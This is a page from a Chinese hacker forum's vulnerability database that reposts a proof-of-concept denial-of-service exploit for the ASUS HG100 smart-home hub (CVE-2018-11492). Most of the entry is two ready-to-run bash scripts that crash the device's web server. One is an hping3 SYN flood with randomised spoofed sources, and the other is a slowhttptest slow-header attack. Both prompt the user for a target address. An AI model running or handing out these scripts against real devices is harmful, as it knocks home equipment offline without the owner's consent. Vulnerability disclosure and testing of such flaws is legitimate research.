ASUS HG100 - Denial of Service - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月8日3年前

# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS 
# Date: 2019-04-14 # Exploit Author: YinT Wang; 
# Vendor Homepage: www.asus.com 
# Version: Hardware version: HG100 、Firmware version:  1.05.12   
# Tested on: Currnet 1.05.12 
# CVE : CVE-2018-11492

1. Description 
The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492).

2.Proof of Concept
Just Execute the following script in kali which could crash the devices

    1. IPv4 packet and in result of devices crash.which written in linux script.

        #needed to co-operate with hping3 tool
        #with the time period at least 220s which could cause web server of HG100 devices crash
        #!/bin/bash
        read -p "enter the ip of HG100 here " url
        hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
        sleep 220
        echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s"
        exit 0

    2.Slowhttp test and caused the devices crash.which written in linux script.

        #needed to co-operate with slowhttptest tool
        #with the time period 600s which could cause web server of HG100 devices crash
        #!/bin/bash
        read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
        slowhttptest -H -R -c 10000 -l 600 -u $url
        sleep 600
        echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
        exit 0

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

ASUS HG100 - Denial of Service

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索